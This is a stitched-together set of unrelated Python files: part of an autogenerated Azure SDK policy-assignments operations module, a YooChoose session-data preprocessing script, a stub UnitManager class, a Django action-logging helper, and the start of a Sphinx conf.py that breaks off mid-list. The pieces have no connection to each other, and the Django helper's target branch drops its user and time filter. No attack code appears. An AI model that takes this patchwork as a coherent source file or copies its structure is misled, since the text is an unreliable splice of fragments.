    )


def build_list_for_resource_request(
    resource_group_name: str,
    resource_provider_namespace: str,
    parent_resource_path: str,
    resource_type: str,
    resource_name: str,
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}/providers/Microsoft.Authorization/policyAssignments')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        "resourceProviderNamespace": _SERIALIZER.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        "parentResourcePath": _SERIALIZER.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        "resourceType": _SERIALIZER.url("resource_type", resource_type, 'str', skip_quote=True),
        "resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )


def build_list_request(
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyAssignments')
    path_format_arguments = {
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )


def build_delete_by_id_request(
    policy_assignment_id: str,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/{policyAssignmentId}')
    path_format_arguments = {
        "policyAssignmentId": _SERIALIZER.url("policy_assignment_id", policy_assignment_id, 'str', skip_quote=True),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="DELETE",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )


def build_create_by_id_request(
    policy_assignment_id: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]

    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/{policyAssignmentId}')
    path_format_arguments = {
        "policyAssignmentId": _SERIALIZER.url("policy_assignment_id", policy_assignment_id, 'str', skip_quote=True),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        json=json,
        content=content,
        **kwargs
    )


def build_get_by_id_request(
    policy_assignment_id: str,
    **kwargs: Any
) -> HttpRequest:
    api_version = "2016-12-01"
    accept = "application/json, text/json"
    # Construct URL
    url = kwargs.pop("template_url", '/{policyAssignmentId}')
    path_format_arguments = {
        "policyAssignmentId": _SERIALIZER.url("policy_assignment_id", policy_assignment_id, 'str', skip_quote=True),
    }

    url = _format_url_section(url, **path_format_arguments)

    # Construct parameters
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )

class PolicyAssignmentsOperations(object):
    """PolicyAssignmentsOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.resource.policy.v2016_12_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def delete(
        self,
        scope: str,
        policy_assignment_name: str,
        **kwargs: Any
    ) -> Optional["_models.PolicyAssignment"]:
        """Deletes a policy assignment.

        :param scope: The scope of the policy assignment.
        :type scope: str
        :param policy_assignment_name: The name of the policy assignment to delete.
        :type policy_assignment_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment or None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.PolicyAssignment"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        
        request = build_delete_request(
            scope=scope,
            policy_assignment_name=policy_assignment_name,
            template_url=self.delete.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    delete.metadata = {'url': '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'}  # type: ignore


    @distributed_trace
    def create(
        self,
        scope: str,
        policy_assignment_name: str,
        parameters: "_models.PolicyAssignment",
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Creates a policy assignment.

        Policy assignments are inherited by child resources. For example, when you apply a policy to a
        resource group that policy is assigned to all resources in the group.

        :param scope: The scope of the policy assignment.
        :type scope: str
        :param policy_assignment_name: The name of the policy assignment.
        :type policy_assignment_name: str
        :param parameters: Parameters for the policy assignment.
        :type parameters: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(parameters, 'PolicyAssignment')

        request = build_create_request(
            scope=scope,
            policy_assignment_name=policy_assignment_name,
            content_type=content_type,
            json=_json,
            template_url=self.create.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    create.metadata = {'url': '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'}  # type: ignore


    @distributed_trace
    def get(
        self,
        scope: str,
        policy_assignment_name: str,
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Gets a policy assignment.

        :param scope: The scope of the policy assignment.
        :type scope: str
        :param policy_assignment_name: The name of the policy assignment to get.
        :type policy_assignment_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        
        request = build_get_request(
            scope=scope,
            policy_assignment_name=policy_assignment_name,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'}  # type: ignore


    @distributed_trace
    def list_for_resource_group(
        self,
        resource_group_name: str,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.PolicyAssignmentListResult"]:
        """Gets policy assignments for the resource group.

        :param resource_group_name: The name of the resource group that contains policy assignments.
        :type resource_group_name: str
        :param filter: The filter to apply on the operation.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PolicyAssignmentListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignmentListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignmentListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            if not next_link:
                
                request = build_list_for_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=self.list_for_resource_group.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_for_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            deserialized = self._deserialize("PolicyAssignmentListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list_for_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Authorization/policyAssignments'}  # type: ignore

    @distributed_trace
    def list_for_resource(
        self,
        resource_group_name: str,
        resource_provider_namespace: str,
        parent_resource_path: str,
        resource_type: str,
        resource_name: str,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.PolicyAssignmentListResult"]:
        """Gets policy assignments for a resource.

        :param resource_group_name: The name of the resource group containing the resource. The name is
         case insensitive.
        :type resource_group_name: str
        :param resource_provider_namespace: The namespace of the resource provider.
        :type resource_provider_namespace: str
        :param parent_resource_path: The parent resource path.
        :type parent_resource_path: str
        :param resource_type: The resource type.
        :type resource_type: str
        :param resource_name: The name of the resource with policy assignments.
        :type resource_name: str
        :param filter: The filter to apply on the operation.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PolicyAssignmentListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignmentListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignmentListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            if not next_link:
                
                request = build_list_for_resource_request(
                    resource_group_name=resource_group_name,
                    resource_provider_namespace=resource_provider_namespace,
                    parent_resource_path=parent_resource_path,
                    resource_type=resource_type,
                    resource_name=resource_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=self.list_for_resource.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_for_resource_request(
                    resource_group_name=resource_group_name,
                    resource_provider_namespace=resource_provider_namespace,
                    parent_resource_path=parent_resource_path,
                    resource_type=resource_type,
                    resource_name=resource_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            deserialized = self._deserialize("PolicyAssignmentListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list_for_resource.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}/providers/Microsoft.Authorization/policyAssignments'}  # type: ignore

    @distributed_trace
    def list(
        self,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.PolicyAssignmentListResult"]:
        """Gets all the policy assignments for a subscription.

        :param filter: The filter to apply on the operation.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PolicyAssignmentListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignmentListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignmentListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            if not next_link:
                
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            deserialized = self._deserialize("PolicyAssignmentListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyAssignments'}  # type: ignore

    @distributed_trace
    def delete_by_id(
        self,
        policy_assignment_id: str,
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Deletes a policy assignment by ID.

        When providing a scope for the assignment, use '/subscriptions/{subscription-id}/' for
        subscriptions, '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}' for
        resource groups, and
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/{resource-provider-namespace}/{resource-type}/{resource-name}'
        for resources.

        :param policy_assignment_id: The ID of the policy assignment to delete. Use the format
         '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policy-assignment-name}'.
        :type policy_assignment_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        
        request = build_delete_by_id_request(
            policy_assignment_id=policy_assignment_id,
            template_url=self.delete_by_id.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    delete_by_id.metadata = {'url': '/{policyAssignmentId}'}  # type: ignore


    @distributed_trace
    def create_by_id(
        self,
        policy_assignment_id: str,
        parameters: "_models.PolicyAssignment",
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Creates a policy assignment by ID.

        Policy assignments are inherited by child resources. For example, when you apply a policy to a
        resource group that policy is assigned to all resources in the group. When providing a scope
        for the assignment, use '/subscriptions/{subscription-id}/' for subscriptions,
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}' for resource groups,
        and
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/{resource-provider-namespace}/{resource-type}/{resource-name}'
        for resources.

        :param policy_assignment_id: The ID of the policy assignment to create. Use the format
         '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policy-assignment-name}'.
        :type policy_assignment_id: str
        :param parameters: Parameters for policy assignment.
        :type parameters: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(parameters, 'PolicyAssignment')

        request = build_create_by_id_request(
            policy_assignment_id=policy_assignment_id,
            content_type=content_type,
            json=_json,
            template_url=self.create_by_id.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    create_by_id.metadata = {'url': '/{policyAssignmentId}'}  # type: ignore


    @distributed_trace
    def get_by_id(
        self,
        policy_assignment_id: str,
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Gets a policy assignment by ID.

        When providing a scope for the assignment, use '/subscriptions/{subscription-id}/' for
        subscriptions, '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}' for
        resource groups, and
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/{resource-provider-namespace}/{resource-type}/{resource-name}'
        for resources.

        :param policy_assignment_id: The ID of the policy assignment to get. Use the format
         '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policy-assignment-name}'.
        :type policy_assignment_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        
        request = build_get_by_id_request(
            policy_assignment_id=policy_assignment_id,
            template_url=self.get_by_id.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get_by_id.metadata = {'url': '/{policyAssignmentId}'}  # type: ignore


# -*- coding: utf-8 -*-
"""
Created on Fri Jun 25 16:20:12 2015

@author: Balázs Hidasi
@lastmodified: Loreto Parisi (loretoparisi at gmail dot com)
"""

import sys
import os
import numpy as np
import pandas as pd
import datetime as dt

# To redirect output to file
class Logger(object):
    def __init__(self, filename="Default.log"):
        self.terminal = sys.stdout
        self.log = open(filename, "a")
    def write(self, message):
        self.terminal.write(message)
        self.log.write(message)
    def flush(self):
        pass
sys.stdout = Logger( os.environ['HOME' ] + '/theano.log' )

PATH_TO_ORIGINAL_DATA = os.environ['HOME'] + '/'
PATH_TO_PROCESSED_DATA = os.environ['HOME'] + '/'

data = pd.read_csv(PATH_TO_ORIGINAL_DATA + 'yoochoose-clicks.dat', sep=',', header=None, usecols=[0,1,2], dtype={0:np.int32, 1:str, 2:np.int64})
data.columns = ['SessionId', 'TimeStr', 'ItemId']
data['Time'] = data.TimeStr.apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%dT%H:%M:%S.%fZ').timestamp()) #This is not UTC. It does not really matter.
del(data['TimeStr'])

session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>1].index)]
item_supports = data.groupby('ItemId').size()
data = data[np.in1d(data.ItemId, item_supports[item_supports>=5].index)]
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>=2].index)]

tmax = data.Time.max()
session_max_times = data.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_test = session_max_times[session_max_times >= tmax-86400].index
train = data[np.in1d(data.SessionId, session_train)]
test = data[np.in1d(data.SessionId, session_test)]
test = test[np.in1d(test.ItemId, train.ItemId)]
tslength = test.groupby('SessionId').size()
test = test[np.in1d(test.SessionId, tslength[tslength>=2].index)]
print('Full train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train), train.SessionId.nunique(), train.ItemId.nunique()))
train.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_full.txt', sep='\t', index=False)
print('Test set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(test), test.SessionId.nunique(), test.ItemId.nunique()))
test.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_test.txt', sep='\t', index=False)

tmax = train.Time.max()
session_max_times = train.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_valid = session_max_times[session_max_times >= tmax-86400].index
train_tr = train[np.in1d(train.SessionId, session_train)]
valid = train[np.in1d(train.SessionId, session_valid)]
valid = valid[np.in1d(valid.ItemId, train_tr.ItemId)]
tslength = valid.groupby('SessionId').size()
valid = valid[np.in1d(valid.SessionId, tslength[tslength>=2].index)]
print('Train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train_tr), train_tr.SessionId.nunique(), train_tr.ItemId.nunique()))
train_tr.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_tr.txt', sep='\t', index=False)
print('Validation set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(valid), valid.SessionId.nunique(), valid.ItemId.nunique()))
valid.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_valid.txt', sep='\t', index=False)


from attributes import *
from constants  import *


# ------------------------------------------------------------------------------
#
class UnitManager (Attributes) :
    """ 
    UnitManager class -- manages a pool 
    """


    # --------------------------------------------------------------------------
    #
    def __init__ (self, url=None, scheduler='default', session=None) :

        Attributes.__init__ (self)


    # --------------------------------------------------------------------------
    #
    def add_pilot (self, pid) :
        """
        add (Compute or Data)-Pilot(s) to the pool
        """

        raise Exception ("%s.add_pilot() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def list_pilots (self, ptype=ANY) :
        """
        List IDs of data and/or compute pilots
        """

        raise Exception ("%s.list_pilots() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def remove_pilot (self, pid, drain=False) :
        """
        Remove pilot(s) (does not cancel the pilot(s), but removes all units
        from the pilot(s).

        `drain` determines what happens to the units which are managed by the
        removed pilot(s).  If `True`, the pilot removal is delayed until all
        units reach a final state.  If `False` (the default), then `RUNNING`
        units will be canceled, and `PENDING` units will be re-assinged to the
        unit managers for re-scheduling to other pilots.
        """

        raise Exception ("%s.remove_pilot() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def submit_unit (self, description) :
        """
        Instantiate and return (Compute or Data)-Unit object(s)
        """

        raise Exception ("%s.submit_unit() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def list_units (self, utype=ANY) :
        """
        List IDs of data and/or compute units
        """

        raise Exception ("%s.list_units() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def get_unit (self, uids) :
        """
        Reconnect to and return (Compute or Data)-Unit object(s)
        """

        raise Exception ("%s.get_unit() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def wait_unit (self, uids, state=[DONE, FAILED, CANCELED], timeout=-1.0) :
        """
        Wait for given unit(s) to enter given state
        """

        raise Exception ("%s.wait_unit() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def cancel_units (self, uids) :
        """
        Cancel given unit(s)
        """

        raise Exception ("%s.cancel_unit() is not implemented" % self.__class__.__name__)


# ------------------------------------------------------------------------------
#



import datetime

from django.contrib.contenttypes.models import ContentType
from django.utils import timezone

from .models import Action


def create_action(user, verb, target=None):
    now = timezone.now()
    last_minute = now - datetime.timedelta(seconds=60)
    similar_actions = Action.objects.filter(user_id=user.id, verb=verb, created__gte=last_minute)

    if target:
        target_ct = ContentType.objects.get_for_model(target)
        similar_actions = Action.objects.filter(target_ct=target_ct, target_id=target.id)

    if not similar_actions:
        action = Action(user=user, verb=verb, target=target)
        action.save()
        return True
    return False

# -*- coding: utf-8 -*-
#
# RedPipe documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 19 13:22:45 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))


# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
import os
import sys
from os import path

ROOTDIR = path.abspath(os.path.dirname(os.path.dirname(__file__)))

sys.path.insert(0, ROOTDIR)

import redpipe  # noqa

extensions = [
    'alabaster',
    'sphinx.ext.autodoc',
    'sphinx.ext.intersphinx',
    'sphinx.ext.viewcode',
